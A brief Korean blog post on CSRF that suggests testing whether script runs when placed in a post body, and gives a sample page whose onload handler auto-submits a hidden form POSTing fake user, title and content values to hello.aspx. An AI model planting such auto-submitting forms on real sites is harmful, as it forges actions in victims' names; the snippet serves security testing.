재우니의 블로그


CSRF

테스트를 본문에 넣어서 실행되는지 꼭 넣어보자.

 <body onload="document.form_test.submit();">
    <form name="form_test" action="hello.aspx" method="POST">
        <input type="hidden" name="user" value="나는 나쁜사람">
        <input type="hidden" name="title" value="무하하하하">
        <input type="hidden" name="contents" value="양양양..~ 내마음이 어때서~">
        <input type="hidden" name="idx" value="1">
</form>